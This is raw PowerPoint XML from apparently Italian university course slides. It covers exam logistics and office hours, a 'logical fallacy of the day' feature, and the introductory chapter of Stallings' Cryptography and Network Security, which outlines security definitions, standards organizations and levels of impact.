            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>? No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> are the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bagels</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" i="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>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err="1"/>
              <a:t>Exam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> procedure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Talk on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>topic</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>The talk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>often</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> must include a live demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Oral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>exam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEACHING TEAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Prof. G. Ianni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Andrea Baffa, M. Sc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OFFICE HOURS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>GB Ianni: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. 15:00 (Online)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Andrea: on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>appointment</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A453F6BE-E193-465A-8342-E1D19F0EB22B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="3717033"/>
            <a:ext cx="1290137" cy="1579852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5F75295-6B2E-4898-8A03-CA7FE2A47FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6157954" y="3717032"/>
            <a:ext cx="1298167" cy="1623872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8036D8CC-9BAF-4BDF-B6FF-BEB3D80B8A2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7609881" y="3717032"/>
            <a:ext cx="1294664" cy="1579852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B0BDB0-5DF2-40AF-AFD8-0DAD1E8097A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860032" y="3140967"/>
            <a:ext cx="1005403" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Material</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD70EEA-C56C-4225-91A2-7D0A079D6D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334363" y="3142709"/>
            <a:ext cx="928459" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Team</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AE3F86-F3AC-401F-8211-B5D058AC44C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7787303" y="3140967"/>
            <a:ext cx="928459" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FB</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D1ED681-63D6-44C8-83D9-40547F4BAA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004048" y="5328065"/>
            <a:ext cx="745770" cy="513218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="heliocentrix.co.uk/wp-content/uploads/2020/04/m...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1E166F-0449-4741-962B-4323F32577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1915" y="5328065"/>
            <a:ext cx="574323" cy="5743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extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F66C82FD-11AA-4C48-A498-4405154D49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1989" y="5373216"/>
            <a:ext cx="459085" cy="4590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LOGICAL FALLACY of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57347" name="Immagine 4" descr="https://yourlogicalfallacyis.com/pdf/LogicalFallaciesInfographic_A3.pdf - Google Chrome"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="60313" t="17091" r="5208" b="44102"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="1844675"/>
            <a:ext cx="619283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LOGICAL FALLACY of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59395" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="9373" t="24306" r="38594" b="19167"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1989138"/>
            <a:ext cx="6343650"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38200" y="457200"/>
            <a:ext cx="7848600" cy="2765425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptography and Network Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3657600"/>
            <a:ext cx="6400800" cy="2671763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fifth Edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>by William Stallings	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lecture slides by Lawrie Brown</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>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ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Content Placeholder 2"/>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Cryptographic algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>symmetric ciphers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>asymmetric encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>hash functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Mutual Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Network Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Computer Security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Standards Organizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Content Placeholder 2"/>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National Institute of Standards &amp; Technology (NIST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Internet Society (ISOC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>International Telecommunication Union Telecommunication Standardization Sector (ITU-T)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>International Organization for Standardization (ISO)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r>
              <a:rPr lang="en-US"/>
              <a:t>Chapter 1 – Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="2133600"/>
            <a:ext cx="8229600" cy="3989388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1"/>
              <a:t>The combination of space, time, and strength that must be considered as the basic elements of this theory of defense makes this a fairly complicated matter. Consequently, it is not easy to find a fixed point of departure.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1"/>
              <a:t>	— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" i="1"/>
              <a:t>On War, Carl Von Clausewitz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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en-US"/>
              <a:t>Computer Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>the protection afforded to an automated information system in order to attain the applicable objectives of preserving the integrity, availability and confidentiality of information system resources (includes hardware, software, firmware, information/data, and telecommunications)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Levels of Impact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>can define 3 levels of impact from a security breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
